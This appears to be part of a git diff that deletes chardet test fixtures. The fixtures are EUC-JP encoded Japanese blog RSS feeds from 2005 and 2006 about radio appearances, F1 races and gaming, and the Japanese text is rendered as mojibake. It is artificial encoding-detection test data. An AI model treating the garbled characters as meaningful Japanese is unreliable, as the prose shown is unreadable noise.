₪ָ₪ך₪¢₪¨₪÷¡¢¸בֱ°ֳז¶ן₪±ֲ­₪ַ»װֶג´ׁ¸ק₪ע₪·₪ֶ¡¢ ÷£₪ֿ¥ֱ¥§¥ֳ¥¯¥₪¥ףֱ°₪־»‏´ײ₪ִ₪ײ₪·¡£ ₪¦₪ֱ₪י₪¬ַס₪₪כ¥¥ֶ¥כ₪־־₪־¥¥ֶ¥כ₪«₪י ּµְ‏¥ֽ¥ֳ¥ָ¥«¥ױ¥§₪ַ¥ְ¥₪¥ה¥ג¥ף¥ֹ¥״¥ֳ¥ֹ₪עֱ°₪ֻ¡¢ ¸ו₪ם₪ֿ¥ן¥₪¥­¥­¥׃¡¼¥ֱ₪ע¸«₪₪¬₪י¡¢ ¥׃¡¼¥כ₪ע°₪ף₪ַ₪₪₪₪¹¡£ ₪ָ₪ֻ₪«₪¯µ₪»‎₪ֱ₪₪₪₪¡× ₪³₪־¼ּ¿¿₪־¥¹¥«¥₪¥ײ¥כ¡¼₪ע¸«₪ֶ¡¢ְ§ָף¥₪¥¥ף¥ָ₪־¥י¥₪¥ײ₪ֿ ּמ³°₪ַ₪ה₪ֳ₪ֶ₪₪·₪₪₪ָ»׳₪₪₪₪·₪¿¡£... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כְ¸₪­ -2005-08-27T08:59:47+09:00 - - -¥ֿ¥ן¥₪¥ִ¥¢¡¼₪״½׀ָ¯ -http://furusatonoeki.cutegirl.jp/main/archives/001185.html -₪µ₪ֶ¡¢£±ֵ₪¢₪כ₪³₪ָ₪ֿ£²ֵ₪¢₪כ¡££²ֵ₪¢₪כ₪³₪ָ₪ֿ¡ִ£ק¡£ ₪µ₪י₪₪כ´סְ׳¡¢ְֱֵג₪ע÷מ₪כ₪¿₪ב₪ֻ¥ֿ¥ן¥₪₪ֻ¹װ₪ֳ₪ֶ₪­₪₪¹¡£ ¸½ֳֿ₪«₪י¥ל¥¡¼¥ָ₪ַ₪­₪ל₪׀¡¢¸ע¿®¡ִ₪¸₪ד₪₪¯₪ֶ¹¹¿·₪·₪₪¹¡£w ²¿₪«¶µ₪־ֿ¢ֽם₪¬₪¢₪כ₪«₪¿₪ֿ¡¢₪³₪ֱ₪י₪₪ַ¡£... -₪₪ֱ₪´₪ָ -₪ױ₪כְ¸₪­ -2005-08-26T02:10:01+09:00 - - -¡ײ÷£ֶ₪ֿ¥ֿ¥ֳ¥װ¡¼₪°ל»‏₪ע₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪·₪¿¡£¡׳ -http://furusatonoeki.cutegirl.jp/main/archives/001184.html -8/20¥²¥¹¥ָ½׀±י₪·₪¿¡ײSHOGO₪־¥×¡¼¥כ¥¥₪¥ָ¥ֻ¥ֳ¥¥ף¡׳ָײֱָ¥µ¥₪¥ָ₪ֻ¥ב¥ֳ¥»¡¼¥¸₪־¼ּ¿¿₪ָONAIR NOTE₪¬¥¢¥ֳ¥׳₪µ₪ל₪₪·₪¿¡£ ₪₪ף₪ָ₪«¥ך¥¢¥כ¥¿¥₪¥א₪ִַ°₪³₪¦₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪±₪ֹ¡¢ְּ₪±‎₪₪ַ»ֵ»צ₪·₪ֶ₪₪·₪¿¡£w ₪¹₪₪ֶ₪ֿ¥ֿ¥ן¥₪₪ַ₪־¥ֿ¥ֳ¥װ¡¼₪°ל»‏₪־°¡£w ₪₪ף₪ָ₪«°לֳֽמ₪ִ₪₪₪ֶ¡¢ֽ½ִךִּ₪ך¹װ₪±₪½₪¦₪ַ₪¹¡£... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-22T15:09:52+09:00 - - -8/22ָ¯ַה¡ײ¥ה¥ף¥°¥¥¬¥¸¥ף¡׳ֹ½»ז₪ֿ₪₪ֳ₪ֱ -http://furusatonoeki.cutegirl.jp/main/archives/001183.html -8/22¡·מ¡ָֻ¯ַה¡ײ¥ה¥ף¥°¥¥¬¥¸¥ף¡׳£³£¸¹ז₪־ֹ½»ז₪ֿ₪₪ֳ₪ֱ¡£ »²¾ָ¥ך¥ף¥¯ ¾¡¥ׁ¥יֶֹ¼װֽף ₪ױ₪¥¡ֱ¡£ ֳ»₪₪₪×ֻµ₪₪ָ₪₪ֳ₪ֱ¥ֿ¥ן¥₪¥ִ¥¢¡¼₪־°¡¢÷£·מ₪ֿ₪₪ֿ¢ֶ£¸»‏₪«₪י£²£´»‏₪₪ַ»ֵ»צ₪ע₪·₪ֶ₪₪₪₪¹¡£ ₪ֱ₪ח₪ֳ₪ָ¥ַ¥£¥¡¼¥·¥ח¡¼₪־¥ל¥₪ע½ס₪¯»‏´ײ₪ֿ₪₪₪₪«₪₪¢¡£ »ֵ»צ₪ָ₪₪ֳ₪ֱ₪ֵ₪¯₪·¡££ק ₪³₪־₪¢₪¿₪ך₪־₪³₪ָ₪ג¿ְֽֽ₪¬²ֳּ£₪·₪ֶ₪¯₪ל₪ֶ¡¢ְטֶ₪־´סְ׳₪ָ₪₪ֳ₪¿₪־₪«₪ג₪ֽ¡£¡ַת¡ֻ ¢­₪ַ¥³¥ב¥ף¥ָ₪עִ÷₪₪₪¿‎₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪·₪¿¡£... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-19T12:24:45+09:00 - - -¡ײ₪ְ₪ֳ₪ֶ¡¡ְ¸₪­₪ַ₪₪¯₪ֱ₪ד¡׳ְ®½¢¡×¡ֱ₪ױ₪ל₪¢₪₪ְ®ְִֵי½©³¡ֱ -http://furusatonoeki.cutegirl.jp/main/archives/001182.html -₪₪₪ה₪¢¡¢₪ה₪ֿ₪ך°¦₪ַ₪·₪ח₪¦₪ֽ¡££ק ֳ¯₪«₪ֵֿצ₪¿₪כ₪ן₪±₪ְ₪«₪י¡¢¼«¬₪¬ֵצ₪¿₪ֳ₪ֶ₪גֱ´ֱ³₪×₪«₪·₪¯₪₪₪₪ָ»׳₪₪ֲ³₪±₪ֶ¡¢ £³£¸²ףּ₪־ֳךֱס£³¡£±£²¡¡¡£²¡ֻ¡£ ₪ִ₪₪₪ֵֻצ₪¿₪ך₪₪·₪¿¡£ ¡ײ₪ױ₪ל₪¢₪₪ֳךֱײס¡₪₪ֳ₪ֱ₪½₪־¾ל₪ִַ¾ֹ®¥µ¥₪¥ףֶ‏₪ך²ס¾ל¸ֲִך£װ¥·¥ד¥ִ¡׳ ³ֲָח²טֱ¡¿¥¯¥ם¡¼¥÷¥¢¥ֳ¥׳²טֱ ְ®ֳִֵכ¸ר±י₪ֿ¡¢£±²ף₪¯₪י₪₪¥ױ¥¡¥¥ך¡¼ְ₪ַ´ׁ₪ט₪¦₪«₪₪¢₪ָ»׳₪ֳ₪ֶ¡¢¥ה¥ױ¥×¥¯₪ַֽמ₪ָ₪·₪¿ְ₪ַ₪·₪¿¡£ ₪₪₪ִ₪ג₪־₪ט₪¦₪ֳֻךֱײס₪¬»ֿ₪₪ך¡¢¥¥¹¥¿¡¼₪־ֵצֱ×¼װ₪¬¥¹¥ֶ¡¼¥¸₪ע¹₪ך₪¿¸ו¡¢£װ¥·¥ד¥ִ₪־ֳךֱ×₪¬¥¹¥¿¡¼¥ָ¡£ ₪₪÷₪ֿ־ףָײ¹ז¡£ ₪₪ֳ₪ֱ₪¬¼ט₪ֳ₪¿¿פ»ת₪ֿ¡ײ£²£¸¡׳¡£ ÷ַ½י¡¢£±³¬₪־£²£¸־ף₪«¡©₪ָ»׳₪ֳ₪¿₪י¡¢ֲ³₪­₪ַ₪­₪ֶ₪₪₪כ₪«₪י£²³¬₪־¼«¬₪־½ך₪ְ₪ָ³־ַ§¡£ ₪₪¢¡¢₪³₪ל₪₪ַ£³²ף₪¯₪י₪₪־ףָײ¹ז₪ֿ³÷ֵצ₪·₪ֶ₪₪₪כ₪«₪י¡¢₪½₪ל₪₪ֹ¥ֹ¥­¥ֳ₪ָ₪ֿ₪»₪÷₪ֻ¿ֶ»ְׂ₪ָ₪₪₪¦₪³₪ָ₪ג₪¢₪ֳ₪ֶ¡¢־©₪ֶ₪₪₪₪־₪ַֽמ₪ֱֳו₪₪₪ֶ÷ֲ₪ֳ₪ֶ₪₪₪¿₪י¡ִ¡£ ¼¡₪ֻ₪₪ֳ₪ֱ₪¬¼ט₪ֳ₪¿₪־₪¬°ל·וֲז₪עֹ½₪¹¿פ»ת¡£ ₪×₪ֳ₪ָ₪©¡ֱ¡¢₪ֱ₪ח₪ֳ₪ָֽט₪¿₪¾₪³₪ל₪ֽֿט₪¿₪ף₪¸₪ד₪₪₪₪«¡©ֽט₪₪¡×ֽט₪₪¡×¥ֹ¥­¥ֹ¥­¡ִ ₪½₪·₪ֶ±¿ּ¿₪־₪×¼¡¡£ֶֹ₪¾ו₪²₪כ₪₪ֳ₪ֱ¡£ °ל½ײ»‏₪¬»₪₪ך¡ִ ·ְ¡«¡«¡«¡«¡«¨¬¨¬¨¬¨¬(¢ֿ)¨¬¨¬¨¬¨¬¨¬¨¬¯!! ¥׃¥ֳ¥¯¥ך¡¢¥ֹ¥­¥ֹ¥­₪¹₪כֱ°₪ֻ´ע₪·₪µ₪¬¹‏₪¾ו₪²₪ֶ₪­₪ֶ¡¢־©₪ֱ¾ו₪¬₪כ₪ָ¡¢ ·¸°ק₪¬ֽט₪ֶ¡¢¡ײ₪³₪ֱ₪י₪«₪י₪×´ך₪₪₪·₪₪¹¡£¡׳ £²³¬₪־¾ל³°₪ֻ½׀₪ֶ¡¢£±³¬₪״₪־³¬ֳ₪ע²¼₪ך₪₪¬₪י₪־½ך₪ַ¡¢ ·¸₪־‎₪¬¡ײ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£¥׃¥ֳ¥¯¥ך₪ַ₪¹₪ט₪ֽ¡£¡׳ ¡ײ₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪¹¡£₪₪₪ה¡¢₪₪µ₪«₪ֽ₪§¡׳₪ֵָת₪¨₪₪¬₪י¡¢µ₪®ֲ­₪ַ£±³¬₪־±¦¸ו‎₪־ָג₪«₪יֶ‏¾ל¡£ ₪ֱ₪ח₪ֳ₪ָ₪ִ₪₪÷₪­₪½₪¦₪ֻ₪₪ך₪₪¬₪י¡¢¥¹¥ֶ¡¼¥¸₪ֵֻ‏ֳו¡£ ·½₪ֱ₪ד₪ף¡¡¡ײ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡׳ ₪ױ₪כְ¸₪­¡¡¡ײ₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪¹¡׳ ·½₪ֱ₪ד₪ף¡¡¡ײ₪×ּ¾ֱ°₪ֿ¡©¡׳ ₪ױ₪כְ¸₪­¡¡¡ײ¡¡₪ַ₪¹¡£¡׳ ₪ֵָת₪¨₪¿₪ָ₪³₪ם₪ַ¡¢ ¥ֿ¥׳¥ֻ¥ף¥°ָ¯ְ¸¡× ·½₪ֱ₪ד₪ף₪ָ₪¢₪₪₪µ₪ִ₪ע₪·₪ֶ₪₪₪¿°¸«₪ֶ₪₪«₪ֳ₪¿₪±₪ֹ¡¢ ₪ֹ₪¦₪ה₪י₪₪ֳ₪ֱ₪¬¥ֶ¡¼¥ײ¥כ₪ֳֻײ₪₪₪ֶ₪¢₪ֳ₪¿¼«¬₪־¥ֹ¥ך¥ף¥¯₪עֵ₪·₪ֶ₪³₪₪·₪ֶ₪·₪₪₪¡¢₪½₪ל₪¬₪³₪ל₪«₪י₪ג₪י₪¦£װ¥·¥ד¥ִ₪ֻ₪«₪«₪ֳ₪ֶ₪·₪₪ֳ₪¿₪י₪·₪₪¡£ ₪¢₪ן₪ֶ₪ױ₪¿₪ב₪¯₪₪ֳ₪ֱ₪ֻ¡¢µְׂ₪«₪י¥ײ¡¼¥₪¥ף¥°¡£ ₪½₪־¥ֹ¥ך¥ף¥¯₪־ֲ¦₪ֳֻײ₪₪₪ֶ₪¢₪כ₪₪ֳ₪ֱ₪¬´ְ₪ע¿¡₪¯¥¿¥×¥כ₪ַ£װ¥·¥ד¥ִ₪ע¥¥ף¥¥ף₪·₪ֶ¡¢ ₪³₪ֳ₪ֱ₪ע¸«₪₪¬₪י¼ױ₪כ₪₪ֳ₪ֱ¡£ ·½₪ֱ₪ד₪ף₪¬¥ױ¥©¥ם¡¼₪ֶֻ‏₪ך¡¢¡ײ¸«₪ֶ₪₪«₪ֳ₪¿₪³₪ָ₪ֻ₪·₪ט₪¦¡׳₪ָ¡£ ¡ײ¸«₪ֶ₪₪»₪ף₪ַ₪·₪¿₪ט₪ֽ¡©¡׳₪ֲָ¥₪µ₪ל₪ֶ¡¢¡ײ₪ֿ₪₪¡׳₪ָנק₪¯¡£ ¡₪ֶ₪₪₪¦₪«₪₪ף₪ֶ¥י¥ֳ¥­¡¼₪½׀ֽט»צ¡×₪³₪ֱ₪י₪¬ֶ¬₪ע²¼₪²₪ֶ¡ײ₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪¹¡׳₪ָ¸ְ₪₪₪¿₪₪₪¯₪י₪₪₪ַ₪·₪¿¡££ק¡ֻ ÷ֶ₪׃·½₪ֱ₪ד₪ף₪ָ¡¢₪½₪·₪ֶ₪₪ֳ₪ֱ₪¬¶ב₪ֵ₪₪₪ֶ₪­₪ֶ¡¢₪½₪³₪ַ½י₪ב₪ֶ¥ֹ¥­¥ֹ¥­₪ֳ₪ָ¶ִ¥¡£ ₪ג₪¦ֶף¿ֽ₪ָ₪גגֱ₪·²ב₪®₪ֶ¡¢ִ¾»כ₪ַ₪­₪₪»₪ף₪ַ₪·₪¿¡£ ·½₪ֱ₪ד₪ף¡¡¡ײ÷£ֶ₪ֿ₪ֹ₪ֱ₪י₪«₪יֽט₪י₪ל₪¿₪ף₪ַ₪¹₪«¡©¡׳... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כְ¸₪­ -2005-08-15T12:23:25+09:00 - - -ְ®ֲִֵ®ף -http://furusatonoeki.cutegirl.jp/main/archives/001181.html -£װ¥·¥ד¥ִֵצֱ×¡× ²טֱ₪ֿ¸ו₪ַ¡£ ·ֲָ׃₪«₪י₪ֿ½׀ֽט₪₪₪₪־₪ַ¡£... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כ₪­₪·₪ד -2005-08-14T17:00:42+09:00 - - -8/20(ֵ)₪־¥×¡¼¥כ¥¥₪¥ָ¥ֻ¥ֳ¥¥ף₪ֵֻ׀¾ל¡©¡× -http://furusatonoeki.cutegirl.jp/main/archives/001177.html -¥²¥¹¥ָ₪«ָֿ₪´₪ָ₪«ֹװְּ₪ַ₪¹₪¬¡¢8/20¡ֵ¡ֻ1:00-3:00 SHOGO(175R)₪־¥×¡¼¥כ¥¥₪¥ָ¥ֻ¥ֳ¥¥ף₪ֻ₪₪ֳ₪ֱ₪¬½׀±י₪¹₪כּֽֽֿ¡£ ¢¡¥ֻ¥ֳ¥¥ףֱק¡¡¥¹¥¥·¥ד¥כ¥¦¥£¡¼¥¯¡¡8¡¿20ֶ¡ֵ¡ֻ »²¾ָ¥ך¥ף¥¯ ¾¡¥ׁ¥יֶֹ¼װֽף... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-14T00:44:02+09:00 - - -8/16¡²׀¡ֻ₪ֿFM¥ט¥³¥ֿ¥¥¸¥ד¥ֳ¥¯ -http://furusatonoeki.cutegirl.jp/main/archives/001176.html -8/16¡²׀¡ֻ¸ב¸ו₪«₪י₪־FM¥ט¥³¥ֿ¥₪־ָײֱָ₪ֻ¥²¥¹¥ָ½׀±י₪¹₪כ₪³₪ָ₪¬ָ½ְּ₪·₪₪·₪¿¡£ ¢¡FM¥ט¥³¥ֿ¥¡¡¥¹¥¥·¥ד¥כ¥׳¥ם¥°¥י¥א¡ץ¸ר³«ְ¸ֱק ¢¡13:00¡ֱ16:00 DAYLIGHT SPLASH ¡»‏´ײֲ׃ֹװְּ¡ֻ ¢¡YOKOHAMA CRUISING ¡17»‏ֲז¡ֻ ¢¡COCO LAVA ¡18»‏ֲז¡ֻ ¢¡Honey Bunny Baby ¡21»‏ֲז¡ֻ »²¾ָ¥ך¥ף¥¯ ¾¡¥ׁ¥יֶֹ¼װֽף... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-14T00:18:40+09:00 - - -¡ײ־ר₪־²ײ¡׳¥·¥ף¥°¥כ£ײ¥¸¥ד¥±¼ָּ½ְּ -http://furusatonoeki.cutegirl.jp/main/archives/001175.html -9/7¡¿ו¡ָֻ¯ַה₪־¥·¥ף¥°¥כ£ײ¡ײ־ר₪־²ײ¡׳₪־¥¸¥ד¥±¼ּ₪¬ָ½ְּ¡£ ¢¡9/7¡¿ו¡ָֻ¯ַה¡¡£ִ£ײ£ִ¥·¥ף¥°¥כ£ײ¡ײ־ר₪־²ײ¡׳¡ד½י²ףֳֵֶµֹץֶ‏¡ה¡¥¿¥ן¡¼¥ל¥³¡¼¥ֹ¡ֻ »²¾ָ¥ך¥ף¥¯ ¾¡¥ׁ¥יֶֹ¼װֽף... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-14T00:04:39+09:00 - - -8/7ֱק¡ײ²¦ֽֽ¥י¥¸¥×¥­¥ֳ¥÷¡׳¥²¥¹¥ָµ­ַ°¼ּ¿¿UP -http://furusatonoeki.cutegirl.jp/main/archives/001174.html -8/7¡ֶ¡ֱֻק₪־¥י¥¸¥×´״ְ¾¡ײ²¦ֽֽ¥י¥¸¥×¥­¥ֳ¥÷¡׳¸ר¼°¥µ¥₪¥ָ¡ײ¥²¥¹¥ָ¥³¡¼¥¡¼¡׳₪ֻ₪₪ֳ₪ֱ₪ָ₪־µ­ַ°¼ּ¿¿₪¬·ַ÷₪µ₪ל₪₪·₪¿¡£ ₪½₪־ֱ°½µ₪ֿ₪¢₪₪₪װ¡¼₪³₪ָ²ֵֽ°¦»ׂ₪ְ₪ֳ₪¿₪־₪ֽ¡£w... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-12T02:02:00+09:00 - - -¿·¶₪ֿ¥¡¼¥«¥כ¥¹¥¿¥₪¥כ₪¬₪ֱ₪ח₪ֳ₪ָ°ד₪¦¡×¡© -http://furusatonoeki.cutegirl.jp/main/archives/001172.html -TVstation²»³¥ֻ¥ו¡¼¥¹₪־¡ײ־ר₪־²ײ¡׳¾ׂ²נµ­»צ₪ֻ₪ט₪כ₪ָ¡¢¿·¶₪ֿ½©₪ֻ¸‏₪±₪¿₪µ₪ן₪ה₪«₪¥¥ֳ¥׳¥ֱ¥ו¡¼¥ף₪ַ¡¢₪³₪ל₪₪ַ₪ָ°ד₪¦¥¡¼¥«¥כ¥¹¥¿¥₪¥כ₪ע₪₪ֳ₪ֱ¼«₪י₪¬¹ֽ₪¨₪ֶ₪₪₪כ₪ָ₪־₪³₪ָ¡£ ¢¡°ֲַ₪₪ִ₪₪־¥ֻ¥ו¡¼¥·¥ף¥°¥כ₪ֿ¡¢₪µ₪ן₪ה₪«¥¥ֳ¥׳¡× ¢¡CD₪ַ¡¼₪¿₪־¾ׂ²נµ­»צ »²¾ָ¥ך¥ף¥¯ ₪ג₪ֿ¥¢¥ָ₪₪ֳ₪ֱ... -₪₪ֳ₪ֱ -₪ױ₪כְ¸₪­ -2005-08-12T02:00:37+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/manana.moo.jp.xml b/chardet/tests/EUC-JP/manana.moo.jp.xml deleted file mode 100644 index c514b60..0000000 --- a/chardet/tests/EUC-JP/manana.moo.jp.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -₪י₪°₪₪₪ -http://nanana.moo.jp/ - -ja - -2005-09-21T21:38:56+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -¥׀¥ָ¥ף¡¢BAR»ִ־±·טִך -http://nanana.moo.jp/archives/000928.html -¥׀¥ָ¥ף₪¬BAR₪ֻ»ִ־±₪¹₪כ₪³₪ָ₪¬·טִך₪·₪₪·₪¿¡£₪³₪ל₪ֻ₪ט₪ֳ₪ֶ÷´ֶ£ֲצֻב₪ֽֿטַ¯₪־¥·¡¼¥ָ₪עֱ׃¼÷₪ָ₪₪₪¦₪³₪ָ₪ֻ¡£־ֹ₪₪·כ²ּ₪ע»ִ₪·₪ֶֽט₪ל₪₪«₪ֳ₪¿₪ְ₪±₪ֻ¡¢°ְׂ₪גֶס₪·₪½₪¦₪ַ₪¹₪ֽ¡£ -F1 -nanana -2005-09-21T21:38:56+09:00 - - -L887ַד₪₪₪₪·₪¿ -http://nanana.moo.jp/archives/000927.html -¥¥¥×₪־FlexScan L887₪ע¹״ֶ‏¡£CRT¢×±ױ¾½₪־ַד₪₪´¹₪¨¡£₪½₪־ֵ¿ֻצ₪ֻ´״₪¹₪כ»¨µ­¡£ - -nanana -2005-08-21T19:11:20+09:00 - - -ִ»¿ֽ´ײ¥³¥ף¥ֶ¥¹¥ָ´ְׁןµ­ -http://nanana.moo.jp/archives/000925.html -ִ»¿ֽ´ײ¥³¥ף¥ֶ¥¹¥ָ₪ע¸«₪ֻ¹װ₪ֳ₪ֶ₪­₪₪·₪¿¡£ -Misc -nanana -2005-07-18T22:39:17+09:00 - - -W31Tַד₪₪₪₪·₪¿ -http://nanana.moo.jp/archives/000924.html -W31T₪ע¹״ֶ‏₪·₪¿₪־₪ַ¥₪¥ף¥׳¥ל¡£ -Mobile -nanana -2005-07-01T21:29:05+09:00 - - -ֲט9ְן ¥¢¥ב¥ך¥«GP -http://nanana.moo.jp/archives/000923.html -F1ֲט9ְן¥¢¥ב¥ך¥«GP¡£¥¥·¥ו¥י¥ףְ×ֱ´°ק¥ך¥¿¥₪¥¢¡£ְ¹₪ך¾ו₪¬₪ך₪ֻ·ח₪±₪כֳז₪ַ₪־¥¥ֿ¥¨¥כֽ¥¾¡¡¢¥ױ¥§¥י¡¼¥ך1-2¡£¥¿¥₪¥ה¸ע´¹¶״»¥כ¡¼¥כ₪ֿ₪ה₪ֳ₪ׁ₪ך¼÷ַװ₪ַ₪¹₪ֽ¡£°ל¿ֽ¥·¥ד¥ף¥ׁ¥ף¥ױ¥¡¥₪¥ָ₪־¥ג¥ף¥ֶ¥₪¥ם₪¬ָב₪·₪₪¡ִ¡£ -F1 -nanana -2005-06-20T22:30:58+09:00 - - -ֶֻ¥¥¯¥ֹ¥¥כ¥ֹ¼ִׂ¹¡¢²‏ּ¾¡© -http://nanana.moo.jp/archives/000922.html -¥¥¯¥ֹ¥¥כ¥ֹ¸÷±׳₪־µ­»צ¡£¼ִׂ¹₪־ּ¾ֱ°₪¬ׁ₪ן₪ֳ₪¿¡© -Misc -nanana -2005-06-18T01:14:44+09:00 - - -¼«ֵ¾¼ײַד₪₪₪₪·₪¿ -http://nanana.moo.jp/archives/000920.html - LOUIS GARNEAU LGS-TR5(PLATINUM)₪ע¹״ֶ‏¡£... -Misc -nanana -2005-04-29T13:36:14+09:00 - - -¥ן¥₪¥׳¥¢¥¦¥ָ ¥װ¥ו¥¢ ( PSP ) -http://nanana.moo.jp/archives/000918.html -¥ן¥₪¥׳¥¢¥¦¥ָ ¥װ¥ו¥¢₪ע¹״ֶ‏¡£¥ײ¥י¥¦¥¶₪־ֶ°÷מ₪ֿ³־ַ§¡£₪ֱ₪ח₪ֳ₪ָ»ָ₪₪₪ֻ₪¯₪₪₪ַ₪¹₪ֽ¡£ -Game -nanana -2005-04-09T22:02:33+09:00 - - -½¢¿¦¡¢₪½₪·₪ֶ°ת₪ֳ±₪· -http://nanana.moo.jp/archives/000916.html -ֲח³״₪עֲ´¶ָ₪·₪ֶ¡¢₪ה₪ֳ₪ָ₪³½¢¿¦₪·₪₪·₪¿¡£₪³₪³₪ֻ»ך₪כ₪ֻ₪ֿה‏ֽ¾¶ְ₪¢₪ֳ₪¿₪ף₪ַ₪¹₪±₪ֹ¡£ ... -Diary -nanana -2005-04-08T21:53:08+09:00 - - -PSP¥·¥¹¥ֶ¥א¥½¥ױ¥ָ¥¦¥§¥¢1.50 ¥ך¥ך¡¼¥¹ -http://nanana.moo.jp/archives/000915.html -PSP₪־¥·¥¹¥ֶ¥א¥½¥ױ¥ָ¥¦¥§¥¢₪־¿·¥׀¡¼¥¸¥ח¥ף1.50₪¬¥ך¥ך¡¼¥¹₪µ₪ל₪₪·₪¿¡£ PSP... -Game -nanana -2005-03-25T02:51:33+09:00 - - -ֲט2ְן ¥¥ל¡¼¥·¥¢GP -http://nanana.moo.jp/archives/000913.html -F1ֲט2ְן¡¢¥¥ל¡¼¥·¥¢GP¡£¸«ֶ¨₪·₪₪·₪¿¡ִ¡£¥¿¥₪¥ה₪־÷¹₪¬½׀₪¿´¶₪¸₪ַ₪·₪ח₪¦₪«¡£ -F1 -nanana -2005-03-22T07:16:47+09:00 - - -HDD Health -http://nanana.moo.jp/archives/000912.html -HDD Health₪־Precision₪¬90%₪ע±₪¨₪¿₪־₪ַ₪×´«₪ב₪·₪ֶ₪₪¿₪ך¡£ -Software -nanana -2005-03-18T08:32:37+09:00 - - -NANACA¢קCRASH!!₪־₪ֿ₪₪· -http://nanana.moo.jp/archives/000911.html -NANACA¢קCRASH!! ÷£÷¢₪«₪₪¡ִֵ×₪¡£ CROSS¢קCHANNEL₪עֲך÷א... -Misc -nanana -2005-03-16T00:31:59+09:00 - - -ֲט1ְן ¥×¡¼¥¹¥ָ¥י¥ך¥¢GP -http://nanana.moo.jp/archives/000909.html -2005ַ¯F1³«ֻכְן¥×¡¼¥¹¥ָ¥י¥ך¥¢GP¡£¥כ¥־¡¼₪־¥ױ¥£¥¸¥±¥י₪¬¸«»צ₪¥¡¼¥כ¥ָ¥¥¥¦¥£¥ף₪ע¾‏₪ך₪₪·₪¿¡£¥כ¥־¡¼₪ֿ¥¢¥ם¥ף¥½₪¬3°ּ₪ַ1-3¥ױ¥£¥ֻ¥ֳ¥·¥ו¡£÷עַ¯ֵ¥¥·¥ף₪ַ₪גְןֶ®־ֿ₪־¹ג₪µ₪ע¸«₪»₪¿¥ױ¥§¥י¡¼¥ך¡£ֽ½ֱ³°₪־־ֿ₪ע¸«₪»₪¿¥ל¥ֳ¥ֹ¥ײ¥כ₪־¥¯¥כ¥µ¡¼¥ֹ¡£÷£ַ¯₪ַּּֿע₪¯₪₪ך₪½₪¦₪ַ₪¹¡£ -F1 -nanana -2005-03-06T16:11:47+09:00 - - -F1³«ֻכ -http://nanana.moo.jp/archives/000908.html -2005ַ¯₪־F1₪¬³«ֻכ¡£÷£ַ¯₪ֿ₪ֹ₪ף₪´¶₪¸₪ֻ₪₪כ₪ף₪ַ₪·₪ח₪¦₪«¡£ -F1 -nanana -2005-03-06T11:43:59+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/mimizun.com.xml b/chardet/tests/EUC-JP/mimizun.com.xml deleted file mode 100644 index 6f52b81..0000000 --- a/chardet/tests/EUC-JP/mimizun.com.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -₪₪₪÷₪ף₪ײ₪ם₪° -http://mimizun.com:81/blog/ -¿ָ¶ב₪½׀ֽט»צ₪עֳ¸¡¹₪ָ -ja - -2006-01-03T12:23:55+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -³ֵ·÷׳₪ך³«÷ֳֵז -http://mimizun.com:81/blog/archives/000322.html -¸ֵ₪¯₪ֿ¥ָ¥₪¥¶¥י¥¹÷׳₪ך₪ַ₪ג¾¡¼װ₪ְ₪ֳ₪¿¡£ ¥ֶ¥ל¥׃₪ַ₪גףֶ»₪µ₪לֽ­ּ¾₪´¹ָ¥ׁ¥½¥³¥ף₪ַ₪ג¾¡¼װ₪ְ₪ֳ₪¿¡£ ₪½₪־¸ו¡¢²¿ֵ₪«÷׳₪ך₪¬₪¢₪כ₪ג₪־₪־ֱ´₪ֶַװ¼װ₪ְ₪ֳ₪¿¡£ ֲח³¢ֶ₪ֻ¥¹¥ל₪¬₪¿₪ֱ₪¹₪ַ₪ֻ1·מ3ֶ¡£³ֵ·÷׳₪ך₪¬ּ₪₪ְ₪ֻ³«÷ֳֵז¡£ ₪₪¼ֲ׀÷צ₪ע₪ָ₪י₪₪₪₪־₪«¡£±ֻ₪¬₪»₪ֶ₪₪₪כ₪־₪ְ₪ם₪¦₪«¡£₪½₪ל₪ָ₪ג¡¦¡¦¡¦ »²¹ֽ¡§£²₪ֱ₪ד₪ף₪ֽ₪כ ¥ֻ¥ו¡¼¥¹ֲ®ף ¥ֻ¥ו¡¼ֲ®ףVIP ₪¨¡£¥³¥ל₪ְ₪±₪¸₪ד₪ן₪«₪ף₪₪₪₪ֳ₪ֶ¡©₪ן₪«₪כ¿ֽ¸‏₪±₪ַ₪¹₪ט¡£... -₪ֽ₪ֳ₪ָ -mimizun -2006-01-03T12:23:55+09:00 - - -2006ַ¯₪־¡»מ₪· -http://mimizun.com:81/blog/archives/000321.html - ¡¡¿·ַ¯ְּ₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ¡¡÷עַ¯ֻצ¡¢₪¢₪­₪׀₪סֱ₪ַ2006ַ¯₪־¡ֲ₪¬ַה₪ך½׀₪µ₪ל₪¿₪־₪ַַד₪ֳ₪ֶ₪₪₪·₪¿¡£ֵ‏ֳו₪ֿ¸µֳ¶₪־÷£ֶ₪ַ₪¹¡£2006±₪ַ¾¦ֶֹגֶֽ₪ֿ¡¦¡¦¡¦ 